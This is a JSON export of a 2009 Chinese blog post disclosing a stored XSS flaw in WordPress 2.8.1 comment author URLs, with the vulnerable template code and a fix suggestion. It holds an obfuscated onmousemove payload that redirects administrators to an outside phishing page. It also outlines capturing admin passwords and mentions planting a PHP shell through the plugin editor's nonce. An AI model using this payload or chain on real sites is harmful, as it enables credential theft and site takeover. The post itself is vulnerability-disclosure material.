{"id":155,"date":"2009-07-16T13:54:49","date_gmt":"2009-07-16T13:54:49","guid":{"rendered":""},"modified":"2011-04-25T08:37:34","modified_gmt":"2011-04-25T08:37:34","slug":"wordpress281%e8%af%84%e8%ae%ba%e6%98%be%e7%a4%baxss%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/155.html","title":{"rendered":"wordpress281\u8bc4\u8bba\u663e\u793axss\u6f0f\u6d1e"},"content":{"rendered":"

wordpress281<\/span>\u8bc4\u8bba\u663e\u793axss<\/span>\u6f0f\u6d1e<\/o:p><\/span><\/span><\/p>\n

by kxlzx inbreak.net<\/span><\/p>\n

 <\/p>\n

ps\uff1a\u611f\u8c22\u9b3c\u4ed4’blog<\/a>\uff0cXEYE’s blog<\/a>\u534f\u52a9\u6d4b\u8bd5\u3002<\/span><\/span><\/p>\n

<\/o:p><\/span><\/p>\n

\u5b9e\u9645\u4e0a\u662f\u4e2aXSS<\/span>\u6f0f\u6d1e\u3002<\/o:p><\/span><\/span><\/p>\n

 <\/o:p><\/span><\/p>\n

POC<\/span>\uff1a<\/span><\/strong><\/p>\n

\n
XML\/HTML\u4ee3\u7801<\/div>\n
    \n
  1. \u5728\u8bc4\u8bba\u7684\u7f51\u5740\u4e00\u680f\uff0c\u586b\u5199   <\/span><\/span><\/li>\n
  2.   <\/span><\/li>\n
  3. http:\/\/blog.sohu.com\/fh8e3333211134333\/f8e9wjfidsj3332dfs’ <\/span>onmousemove<\/span>=’<\/span>location.href<\/span>=<\/span>String<\/span>.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);   <\/span><\/li>\n<\/ol>\n<\/div>\n

     \u8fd9\u6bb5\u4ee3\u7801\u4ec5\u4f9b\u6d4b\u8bd5\uff0c\u662f\u4e0d\u80fd\u76f4\u63a5\u7528\u7684\u3002<\/o:p><\/span><\/span><\/p>\n

    \u5982\u679c\u4f60\u62ff\u6211\u7684shellcode<\/span>\u53bb\u6253\u522b\u4eba\u7684\u7ad9\uff0c\u90a3\u5bc6\u7801\u5c31\u5f52\u6211\u4e86\uff0c\u6765\u4e4b\u4e0d\u62d2\u554a\u3002<\/o:p><\/span><\/span><\/p>\n

     <\/o:p><\/span><\/p>\n

    \u7ba1\u7406\u5458\u5ba1\u6838\u65f6\uff0c\u53ea\u8981\u9f20\u6807\u4eceurl<\/span>\u4e0a\u8def\u8fc7\uff0c\u5c31\u4f1a\u8df3\u8f6c\u5230http:\/\/inbreak.net\/a.php<\/font><\/a><\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    <\/o:p><\/span><\/p>\n

    \u8fd9\u91cc\u662f\u4e2a\u5047\u7684\u767b\u5f55\u9875\u9762\uff0c\u9493\u9c7c\u7528\u3002<\/o:p><\/span><\/span><\/p>\n

    \"1.jpg\"<\/a><\/o:p><\/span><\/p>\n

    \u7ba1\u7406\u5458\u767b\u5f55\u540e\uff0c\u6211\u4eec\u5c31\u80fd\u8bb0\u5f55\u5bc6\u7801\u3002<\/o:p><\/span><\/span><\/p>\n

    \"2.jpg\"<\/a><\/span><\/o:p><\/span><\/p>\n

    <\/o:p><\/span><\/p>\n

    \u5bf9\u4e8e\u6574\u4e2a\u6d41\u7a0b\u8bf4\u660e\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

    1<\/span>\uff0c\u53d1\u8bc4\u8bba\u8ba9\u7ba1\u7406\u5458\u5bf9\u4f60\u7684url<\/span>\u6709\u5174\u8da3\uff0c\u7136\u540e\u7b49\u7ba1\u7406\u5458\u4e0a\u94a9\u3002<\/o:p><\/span><\/span><\/p>\n

    2<\/span>\uff0c\u7ba1\u7406\u5458\u5728\u540e\u53f0\u628a\u9f20\u6807\u79fb\u52a8\u5230\u4f60\u7684url<\/span>\u4e0a\u3002<\/o:p><\/span><\/span><\/p>\n

    3<\/span>\uff0c\u8df3\u8f6c\u5230a.php<\/span>\uff0c\u5148\u83b7\u53d6referer<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    4<\/span>\uff0c\u8f93\u5165\u5bc6\u7801\u540e\uff0c\u63d0\u4ea4\u5230kxlzxtest\/testxss\/wp.php<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    5<\/span>\uff0creferer<\/span>\uff0cuser<\/span>\uff0cpass<\/span>\u4fdd\u5b58\u4e3a\"<\/span>\u57df\u540d.txt\"<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    6<\/span>\uff0c\u8f93\u51fa\u4e00\u6bb5JS<\/span>\uff0c\u8df3\u8f6c\u5230referer<\/span>\u5730\u5740\u53bb\u3002<\/o:p><\/span><\/span><\/p>\n

     <\/o:p><\/span><\/p>\n

    a.php<\/span>\u4ee3\u7801\uff1a<\/span><\/strong><\/p>\n

    \n
    PHP\u4ee3\u7801<\/div>\n
      \n
    1. <?php   <\/span><\/span><\/li>\n
    2.   <\/span><\/li>\n
    3. $website<\/span> = <\/span>$_SERVER<\/span>[<\/span>‘HTTP_REFERER’<\/span>];   <\/span><\/li>\n
    4.   <\/span><\/li>\n
    5. $website<\/span>=<\/span>strtolower<\/span>(<\/span>$website<\/span>);   <\/span><\/li>\n
    6.   <\/span><\/li>\n
    7. $website<\/span>=<\/span>substr<\/span>(<\/span>$website<\/span>,7);   <\/span><\/li>\n
    8.   <\/span><\/li>\n
    9. $website<\/span>=<\/span>substr<\/span>(<\/span>$website<\/span>,0,<\/span>strpos<\/span>(<\/span>$website<\/span>,<\/span>‘\/’<\/span>));   <\/span><\/li>\n
    10.   <\/span><\/li>\n
    11.     <\/span><\/li>\n
    12.   <\/span><\/li>\n
    13. \/\/\u8fd9\u4e2a\u9875\u9762\u662f\u7528\u6765\u5192\u5145\u767b\u5f55\u9875\u9762\u7684\uff0c\u5371\u5bb3\u5de8\u5927\uff0c\u4ee3\u7801\u4e0d\u65b9\u4fbf\u63d0\u4f9b\u3002 <\/span>  <\/span><\/li>\n
    14.   <\/span><\/li>\n
    15.     <\/span><\/li>\n
    16.   <\/span><\/li>\n
    17. ?>   <\/span><\/li>\n
    18.   <\/span><\/li>\n<\/ol>\n<\/div>\n

       wp.php<\/span>\u4ee3\u7801<\/o:p><\/span><\/span><\/strong><\/p>\n

       <\/p>\n

      <\/o:p><\/span><\/p>\n

      <\/o:p><\/span>\u55ef\u3002\u3002\u3002\u672c\u6765\u6253\u7b97\u548c\u67d0\u4e2a\u77ed\u4fe1\u5e73\u53f0\u914d\u5408\u4e00\u4e0b\uff0c\u7ed9\u6211\u53d1\u77ed\u4fe1\u63d0\u9192\u7684\uff0c\u540e\u6765\u56e0\u4e3a\u61d2\uff0c\u5c31\u6ca1\u5199\u3002<\/span><\/p>\n

      \n
      SHELL\u4ee3\u7801<\/div>\n
        \n
      1. <?<\/span>php<\/span>       <\/span><\/span><\/li>\n
      2.   <\/span><\/li>\n
      3. \/\/\u88ablv\u8001\u5b50\u8fc7\u6ee4\u3002   <\/span><\/li>\n
      4.   <\/span><\/li>\n
      5. ?><\/span>      <\/span><\/li>\n<\/ol>\n<\/div>\n

         \u8fd9\u53ea\u662f\u4e2aDEMO<\/span>\uff0c\u5b9e\u9645\u4e0a\uff0c\u540e\u53f0\u6709\u7f16\u8f91PHP<\/span>\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u4f60\u53ef\u4ee5\u5199\u4e2aAJAX<\/span>\u51fa\u6765\uff0c\u81ea\u52a8\u83b7\u53d6\u7f16\u8f91\u63d2\u4ef6\u6587\u4ef6\u7684\u9875\u9762\u4e2d\u7684token<\/span>\u5b57\u6bb5\uff08\u540d\u5b57\u5fd8\u8bb0\u4e86\uff0c\u53eb\u505aXXonce<\/span>\uff09\uff0c\u4e4b\u540e\u63d0\u4ea4\u4e00\u4e2aPHP shell<\/span>\u8fc7\u53bb\u3002\u5c31\u4e0d\u7528\u9493\u9c7c\u4e86\u3002<\/o:p><\/span><\/span><\/p>\n

         <\/o:p><\/span><\/p>\n

        \u6f0f\u6d1e\u4ee3\u7801\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

        wordpress\\wp-admin\\includes\\template.php<\/o:p><\/span><\/p>\n

        \u6587\u4ef6\u4e2d\u7684$author_url<\/span>\u6ca1\u6709\u5bf9\u5355\u5f15\u53f7\u505a\u8fc7\u6ee4\uff0c\u6700\u540e\u53c8\u4f7f\u7528\u62fc\u63a5href='$author_url'<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

        \u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u6dfb\u52a0\u4e00\u4e2a\u8fd9\u4e2ahref<\/span>\u7684\u4e8b\u4ef6\u51fd\u6570\u8fdb\u53bb\u3002<\/span><\/p>\n

        <\/p>\n

        \n
        PHP\u4ee3\u7801<\/div>\n
          \n
        1.   <\/span><\/li>\n
        2. 2085:<\/span>$author_url<\/span> = get_comment_author_url();   <\/span><\/li>\n
        3.   <\/span><\/li>\n
        4.  <\/li>\n
        5.   <\/span><\/li>\n
        6. 2182:<\/span>case<\/span> <\/span>'author'<\/span>:   <\/span><\/li>\n
        7.   <\/span><\/li>\n
        8.   <\/span>echo<\/span> <\/span>\"<td $attributes><strong>\"<\/span>; comment_author(); <\/span>echo<\/span> <\/span>'<\/strong><br \/>'<\/span>;   <\/span><\/li>\n
        9.   <\/span><\/li>\n
        10.      <\/span>if<\/span> ( !<\/span>empty<\/span>(<\/span>$author_url<\/span>) )   <\/span><\/li>\n
        11.   <\/span><\/li>\n
        12.          <\/span>echo<\/span> <\/span>\"<a title='$author_url' href='$author_url'>$author_url_display<\/a><br \/>\"<\/span>;   <\/span><\/li>\n
        13.  <\/span><\/li>\n<\/ol>\n<\/div>\n

          <\/span><\/p>\n

           <\/p>\n

           \u524d\u53f0\u7684\u8bc4\u8bba\u5c55\u793a\uff0c\u4e5f\u5b58\u5728\u8fd9\u4e2a\u6f0f\u6d1e<\/strong>\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/p>\n

          \u4fee\u8865\u65b9\u5f0f\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

          \u4e0d\u5efa\u8bae\u81ea\u5df1\u624b\u5de5\u4fee\u8865\uff0c\u5efa\u8bae\u628a\u8bc4\u8bba\u6682\u65f6\u5173\u95ed\uff0c\u7136\u540e\u7b49\u5b98\u65b9\u8865\u4e01\u5c31\u662f\u4e86\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

          \u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5b98\u65b9\u53ef\u80fd\u8fd8\u4e0d\u77e5\u9053\u3002<\/span><\/p>\n

           <\/p>\n

          \u8bed\u8a00\u4e0d\u901a\uff0c\u597d\u5fc3\u4eba\u770b\u5230\u7684\u540c\u65f6\uff0c\u53ef\u4ee5\u901a\u77e5\u4e0b\u5b98\u65b9\u3002<\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

           <\/p>\n","protected":false},"excerpt":{"rendered":"

          wordpress281<\/span>\u8bc4\u8bba\u663e\u793axss<\/span>\u6f0f\u6d1e<\/o:p><\/span><\/span><\/p>\n

          by kxlzx inbreak.net<\/span><\/p>\n

          <\/o:p><\/span><\/p>\n

          ps\uff1a\u611f\u8c22\u9b3c\u4ed4’blog<\/a>\uff0cXEYE’s blog<\/a>\u534f\u52a9\u6d4b\u8bd5\u3002<\/span><\/p>\n

          \u5b9e\u9645\u4e0a\u662f\u4e2aXSS<\/span>\u6f0f\u6d1e\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

          POC<\/span>\uff1a<\/o:p><\/span><\/span><\/p>\n

          \u5728\u8bc4\u8bba\u7684\u7f51\u5740\u4e00\u680f\uff0c\u586b\u5199<\/o:p><\/span><\/span><\/p>\n

          http:\/\/blog.sohu.com\/fh8e3333211134333\/f8e9wjfidsj3332dfs<\/a>‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);<\/o:p><\/span><\/p>\n

          \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[52,24],"views":11458,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=155"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155\/revisions"}],"predecessor-version":[{"id":225,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155\/revisions\/225"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}